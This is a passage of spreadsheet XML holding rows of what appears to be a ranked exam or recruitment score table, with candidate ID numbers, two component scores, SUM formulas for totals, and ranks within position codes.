      <c r="H178" s="8" t="n">
        <f aca="false">SUM(E178:G178)</f>
        <v>113.6</v>
      </c>
      <c r="I178" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="179" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A179" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B179" s="8" t="n">
        <v>1314010224</v>
      </c>
      <c r="C179" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D179" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E179" s="8" t="n">
        <v>48</v>
      </c>
      <c r="F179" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G179" s="8"/>
      <c r="H179" s="8" t="n">
        <f aca="false">SUM(E179:G179)</f>
        <v>110</v>
      </c>
      <c r="I179" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="180" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A180" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B180" s="8" t="n">
        <v>1314010219</v>
      </c>
      <c r="C180" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D180" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E180" s="8" t="n">
        <v>63</v>
      </c>
      <c r="F180" s="8" t="n">
        <v>45</v>
      </c>
      <c r="G180" s="8"/>
      <c r="H180" s="8" t="n">
        <f aca="false">SUM(E180:G180)</f>
        <v>108</v>
      </c>
      <c r="I180" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="181" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A181" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B181" s="8" t="n">
        <v>1314010225</v>
      </c>
      <c r="C181" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D181" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E181" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F181" s="8" t="n">
        <v>30</v>
      </c>
      <c r="G181" s="8"/>
      <c r="H181" s="8" t="n">
        <f aca="false">SUM(E181:G181)</f>
        <v>86.2</v>
      </c>
      <c r="I181" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="182" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A182" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B182" s="8" t="n">
        <v>1314010221</v>
      </c>
      <c r="C182" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D182" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E182" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F182" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G182" s="8"/>
      <c r="H182" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I182" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="183" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A183" s="8" t="n">
        <v>4107020</v>
      </c>
      <c r="B183" s="8" t="n">
        <v>1314010230</v>
      </c>
      <c r="C183" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D183" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E183" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="F183" s="8" t="n">
        <v>52</v>
      </c>
      <c r="G183" s="8"/>
      <c r="H183" s="8" t="n">
        <f aca="false">SUM(E183:G183)</f>
        <v>121.6</v>
      </c>
      <c r="I183" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="184" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A184" s="8" t="n">
        <v>4107020</v>
      </c>
      <c r="B184" s="8" t="n">
        <v>1314010229</v>
      </c>
      <c r="C184" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D184" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E184" s="8" t="n">
        <v>67</v>
      </c>
      <c r="F184" s="8" t="n">
        <v>48</v>
      </c>
      <c r="G184" s="8"/>
      <c r="H184" s="8" t="n">
        <f aca="false">SUM(E184:G184)</f>
        <v>115</v>
      </c>
      <c r="I184" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="185" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A185" s="8" t="n">
        <v>4107020</v>
      </c>
      <c r="B185" s="8" t="n">
        <v>1314010228</v>
      </c>
      <c r="C185" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D185" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E185" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="F185" s="8" t="n">
        <v>43</v>
      </c>
      <c r="G185" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H185" s="8" t="n">
        <f aca="false">SUM(E185:G185)</f>
        <v>110.2</v>
      </c>
      <c r="I185" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="186" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A186" s="8" t="n">
        <v>4107020</v>
      </c>
      <c r="B186" s="8" t="n">
        <v>1314010226</v>
      </c>
      <c r="C186" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D186" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E186" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F186" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G186" s="8"/>
      <c r="H186" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I186" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="187" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A187" s="8" t="n">
        <v>4107020</v>
      </c>
      <c r="B187" s="8" t="n">
        <v>1314010227</v>
      </c>
      <c r="C187" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D187" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E187" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F187" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G187" s="8"/>
      <c r="H187" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I187" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="188" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A188" s="8" t="n">
        <v>4108025</v>
      </c>
      <c r="B188" s="8" t="n">
        <v>1314010305</v>
      </c>
      <c r="C188" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D188" s="8" t="s">
        <v>114</v>
      </c>
      <c r="E188" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F188" s="8" t="n">
        <v>69</v>
      </c>
      <c r="G188" s="8"/>
      <c r="H188" s="8" t="n">
        <f aca="false">SUM(E188:G188)</f>
        <v>130.6</v>
      </c>
      <c r="I188" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="189" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A189" s="8" t="n">
        <v>4200044</v>
      </c>
      <c r="B189" s="8" t="n">
        <v>1314010701</v>
      </c>
      <c r="C189" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D189" s="8" t="s">
        <v>116</v>
      </c>
      <c r="E189" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="F189" s="8" t="n">
        <v>72</v>
      </c>
      <c r="G189" s="8"/>
      <c r="H189" s="8" t="n">
        <f aca="false">SUM(E189:G189)</f>
        <v>134.2</v>
      </c>
      <c r="I189" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="190" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A190" s="8" t="n">
        <v>4200044</v>
      </c>
      <c r="B190" s="8" t="n">
        <v>1314010702</v>
      </c>
      <c r="C190" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D190" s="8" t="s">
        <v>116</v>
      </c>
      <c r="E190" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F190" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="G190" s="8"/>
      <c r="H190" s="8" t="n">
        <f aca="false">SUM(E190:G190)</f>
        <v>114.4</v>
      </c>
      <c r="I190" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="191" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A191" s="8" t="n">
        <v>4200044</v>
      </c>
      <c r="B191" s="8" t="n">
        <v>1314010703</v>
      </c>
      <c r="C191" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D191" s="8" t="s">
        <v>116</v>
      </c>
      <c r="E191" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F191" s="8" t="n">
        <v>56</v>
      </c>
      <c r="G191" s="8"/>
      <c r="H191" s="8" t="n">
        <f aca="false">SUM(E191:G191)</f>
        <v>112.6</v>
      </c>
      <c r="I191" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="192" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A192" s="8" t="n">
        <v>4200045</v>
      </c>
      <c r="B192" s="8" t="n">
        <v>1314010705</v>
      </c>
      <c r="C192" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D192" s="8" t="s">
        <v>117</v>
      </c>
      <c r="E192" s="8" t="n">
        <v>67.6</v>
      </c>
      <c r="F192" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G192" s="8"/>
      <c r="H192" s="8" t="n">
        <f aca="false">SUM(E192:G192)</f>
        <v>134.2</v>
      </c>
      <c r="I192" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="193" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A193" s="8" t="n">
        <v>4200045</v>
      </c>
      <c r="B193" s="8" t="n">
        <v>1314010704</v>
      </c>
      <c r="C193" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D193" s="8" t="s">
        <v>117</v>
      </c>
      <c r="E193" s="8" t="n">
        <v>70.6</v>
      </c>
      <c r="F193" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G193" s="8"/>
      <c r="H193" s="8" t="n">
        <f aca="false">SUM(E193:G193)</f>
        <v>129.6</v>
      </c>
      <c r="I193" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="194" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A194" s="8" t="n">
        <v>4200045</v>
      </c>
      <c r="B194" s="8" t="n">
        <v>1314010706</v>
      </c>
      <c r="C194" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D194" s="8" t="s">
        <v>117</v>
      </c>
      <c r="E194" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="F194" s="8" t="n">
        <v>60.6</v>
      </c>
      <c r="G194" s="8"/>
      <c r="H194" s="8" t="n">
        <f aca="false">SUM(E194:G194)</f>
        <v>124.8</v>
      </c>
      <c r="I194" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="195" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A195" s="8" t="n">
        <v>4200046</v>
      </c>
      <c r="B195" s="8" t="n">
        <v>1314010707</v>
      </c>
      <c r="C195" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D195" s="8" t="s">
        <v>118</v>
      </c>
      <c r="E195" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F195" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G195" s="8"/>
      <c r="H195" s="8" t="n">
        <f aca="false">SUM(E195:G195)</f>
        <v>114</v>
      </c>
      <c r="I195" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="196" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A196" s="8" t="n">
        <v>4200046</v>
      </c>
      <c r="B196" s="8" t="n">
        <v>1314010708</v>
      </c>
      <c r="C196" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D196" s="8" t="s">
        <v>118</v>
      </c>
      <c r="E196" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F196" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="G196" s="8"/>
      <c r="H196" s="8" t="n">
        <f aca="false">SUM(E196:G196)</f>
        <v>108.2</v>
      </c>
      <c r="I196" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="197" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A197" s="8" t="n">
        <v>4200046</v>
      </c>
      <c r="B197" s="8" t="n">
        <v>1314010709</v>
      </c>
      <c r="C197" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D197" s="8" t="s">
        <v>118</v>
      </c>
      <c r="E197" s="8" t="n">
        <v>33.8</v>
      </c>
      <c r="F197" s="8" t="n">
        <v>41</v>
      </c>
      <c r="G197" s="8"/>
      <c r="H197" s="8" t="n">
        <f aca="false">SUM(E197:G197)</f>
        <v>74.8</v>
      </c>
      <c r="I197" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="198" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A198" s="8" t="n">
        <v>4200047</v>
      </c>
      <c r="B198" s="8" t="n">
        <v>1314010712</v>
      </c>
      <c r="C198" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D198" s="8" t="s">
        <v>119</v>
      </c>
      <c r="E198" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="F198" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G198" s="8"/>
      <c r="H198" s="8" t="n">
        <f aca="false">SUM(E198:G198)</f>
        <v>135.4</v>
      </c>
      <c r="I198" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="199" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A199" s="8" t="n">
        <v>4200047</v>
      </c>
      <c r="B199" s="8" t="n">
        <v>1314010710</v>
      </c>
      <c r="C199" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D199" s="8" t="s">
        <v>119</v>
      </c>
      <c r="E199" s="8" t="n">
        <v>49</v>
      </c>
      <c r="F199" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="G199" s="8"/>
      <c r="H199" s="8" t="n">
        <f aca="false">SUM(E199:G199)</f>
        <v>111.8</v>
      </c>
      <c r="I199" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="200" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A200" s="8" t="n">
        <v>4200047</v>
      </c>
      <c r="B200" s="8" t="n">
        <v>1314010711</v>
      </c>
      <c r="C200" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D200" s="8" t="s">
        <v>119</v>
      </c>
      <c r="E200" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F200" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G200" s="8"/>
      <c r="H200" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I200" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="201" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A201" s="8" t="n">
        <v>4200048</v>
      </c>
      <c r="B201" s="8" t="n">
        <v>1314010713</v>
      </c>
      <c r="C201" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D201" s="8" t="s">
        <v>120</v>
      </c>
      <c r="E201" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="F201" s="8" t="n">
        <v>67.4</v>
      </c>
      <c r="G201" s="8"/>
      <c r="H201" s="8" t="n">
        <f aca="false">SUM(E201:G201)</f>
        <v>129.2</v>
      </c>
      <c r="I201" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="202" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A202" s="8" t="n">
        <v>4200048</v>
      </c>
      <c r="B202" s="8" t="n">
        <v>1314010714</v>
      </c>
      <c r="C202" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D202" s="8" t="s">
        <v>120</v>
      </c>
      <c r="E202" s="8" t="n">
        <v>66</v>
      </c>
      <c r="F202" s="8" t="n">
        <v>60.6</v>
      </c>
      <c r="G202" s="8"/>
      <c r="H202" s="8" t="n">
        <f aca="false">SUM(E202:G202)</f>
        <v>126.6</v>
      </c>
      <c r="I202" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="203" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A203" s="8" t="n">
        <v>4200048</v>
      </c>
      <c r="B203" s="8" t="n">
        <v>1314010715</v>
      </c>
      <c r="C203" s="8" t="s">
        <v>115</v>
      </c>
      <c r="D203" s="8" t="s">
        <v>120</v>
      </c>
      <c r="E203" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F203" s="8" t="n">
        <v>60</v>
      </c>
      <c r="G203" s="8"/>
      <c r="H203" s="8" t="n">
        <f aca="false">SUM(E203:G203)</f>
        <v>114.6</v>
      </c>
      <c r="I203" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="204" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A204" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B204" s="8" t="n">
        <v>1314010724</v>
      </c>
      <c r="C204" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D204" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E204" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F204" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G204" s="8"/>
      <c r="H204" s="8" t="n">
        <f aca="false">SUM(E204:G204)</f>
        <v>125</v>
      </c>
      <c r="I204" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="205" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A205" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B205" s="8" t="n">
        <v>1314010730</v>
      </c>
      <c r="C205" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D205" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E205" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="F205" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G205" s="8"/>
      <c r="H205" s="8" t="n">
        <f aca="false">SUM(E205:G205)</f>
        <v>114</v>
      </c>
      <c r="I205" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="206" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A206" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B206" s="8" t="n">
        <v>1314010716</v>
      </c>
      <c r="C206" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D206" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E206" s="8" t="n">
        <v>47.4</v>
      </c>
      <c r="F206" s="8" t="n">
        <v>64.6</v>
      </c>
      <c r="G206" s="8"/>
      <c r="H206" s="8" t="n">
        <f aca="false">SUM(E206:G206)</f>
        <v>112</v>
      </c>
      <c r="I206" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="207" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A207" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B207" s="8" t="n">
        <v>1314010806</v>
      </c>
      <c r="C207" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D207" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E207" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F207" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G207" s="8"/>
      <c r="H207" s="8" t="n">
        <f aca="false">SUM(E207:G207)</f>
        <v>111.8</v>
      </c>
      <c r="I207" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="208" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A208" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B208" s="8" t="n">
        <v>1314010723</v>
      </c>
      <c r="C208" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D208" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E208" s="8" t="n">
        <v>42.6</v>
      </c>
      <c r="F208" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G208" s="8"/>
      <c r="H208" s="8" t="n">
        <f aca="false">SUM(E208:G208)</f>
        <v>110.6</v>
      </c>
      <c r="I208" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="209" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A209" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B209" s="8" t="n">
        <v>1314010726</v>
      </c>
      <c r="C209" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D209" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E209" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F209" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G209" s="8"/>
      <c r="H209" s="8" t="n">
        <f aca="false">SUM(E209:G209)</f>
        <v>110.4</v>
      </c>
      <c r="I209" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="210" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A210" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B210" s="8" t="n">
        <v>1314010718</v>
      </c>
      <c r="C210" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D210" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E210" s="8" t="n">
        <v>44</v>
      </c>
      <c r="F210" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="G210" s="8"/>
      <c r="H210" s="8" t="n">
        <f aca="false">SUM(E210:G210)</f>
        <v>108.4</v>
      </c>
      <c r="I210" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="211" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A211" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B211" s="8" t="n">
        <v>1314010717</v>
      </c>
      <c r="C211" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D211" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E211" s="8" t="n">
        <v>42</v>
      </c>
      <c r="F211" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G211" s="8"/>
      <c r="H211" s="8" t="n">
        <f aca="false">SUM(E211:G211)</f>
        <v>106</v>
      </c>
      <c r="I211" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="212" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A212" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B212" s="8" t="n">
        <v>1314010808</v>
      </c>
      <c r="C212" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D212" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E212" s="8" t="n">
        <v>49.8</v>
      </c>
      <c r="F212" s="8" t="n">
        <v>56</v>
      </c>
      <c r="G212" s="8"/>
      <c r="H212" s="8" t="n">
        <f aca="false">SUM(E212:G212)</f>
        <v>105.8</v>
      </c>
      <c r="I212" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="213" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A213" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B213" s="8" t="n">
        <v>1314010725</v>
      </c>
      <c r="C213" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D213" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E213" s="8" t="n">
        <v>50</v>
      </c>
      <c r="F213" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="G213" s="8"/>
      <c r="H213" s="8" t="n">
        <f aca="false">SUM(E213:G213)</f>
        <v>104.8</v>
      </c>
      <c r="I213" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="214" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A214" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B214" s="8" t="n">
        <v>1314010720</v>
      </c>
      <c r="C214" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D214" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E214" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F214" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="G214" s="8"/>
      <c r="H214" s="8" t="n">
        <f aca="false">SUM(E214:G214)</f>
        <v>104.2</v>
      </c>
      <c r="I214" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="215" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A215" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B215" s="8" t="n">
        <v>1314010810</v>
      </c>
      <c r="C215" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D215" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E215" s="8" t="n">
        <v>47.4</v>
      </c>
      <c r="F215" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="G215" s="8"/>
      <c r="H215" s="8" t="n">
        <f aca="false">SUM(E215:G215)</f>
        <v>103.8</v>
      </c>
      <c r="I215" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="216" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A216" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B216" s="8" t="n">
        <v>1314010722</v>
      </c>
      <c r="C216" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D216" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E216" s="8" t="n">
        <v>46.6</v>
      </c>
      <c r="F216" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="G216" s="8"/>
      <c r="H216" s="8" t="n">
        <f aca="false">SUM(E216:G216)</f>
        <v>102.2</v>
      </c>
      <c r="I216" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="217" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A217" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B217" s="8" t="n">
        <v>1314010804</v>
      </c>
      <c r="C217" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D217" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E217" s="8" t="n">
        <v>41</v>
      </c>
      <c r="F217" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="G217" s="8"/>
      <c r="H217" s="8" t="n">
        <f aca="false">SUM(E217:G217)</f>
        <v>101.8</v>
      </c>
      <c r="I217" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="218" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A218" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B218" s="8" t="n">
        <v>1314010719</v>
      </c>
      <c r="C218" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D218" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E218" s="8" t="n">
        <v>40.8</v>
      </c>
      <c r="F218" s="8" t="n">
        <v>60</v>
      </c>
      <c r="G218" s="8"/>
      <c r="H218" s="8" t="n">
        <f aca="false">SUM(E218:G218)</f>
        <v>100.8</v>
      </c>
      <c r="I218" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="219" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A219" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B219" s="8" t="n">
        <v>1314010728</v>
      </c>
      <c r="C219" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D219" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E219" s="8" t="n">
        <v>41</v>
      </c>
      <c r="F219" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="G219" s="8"/>
      <c r="H219" s="8" t="n">
        <f aca="false">SUM(E219:G219)</f>
        <v>100.2</v>
      </c>
      <c r="I219" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="220" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A220" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B220" s="8" t="n">
        <v>1314010807</v>
      </c>
      <c r="C220" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D220" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E220" s="8" t="n">
        <v>40.8</v>
      </c>
      <c r="F220" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="G220" s="8"/>
      <c r="H220" s="8" t="n">
        <f aca="false">SUM(E220:G220)</f>
        <v>98.2</v>
      </c>
      <c r="I220" s="8" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="221" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A221" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B221" s="8" t="n">
        <v>1314010801</v>
      </c>
      <c r="C221" s="8" t="s">
        <v>121</v>
      </c>
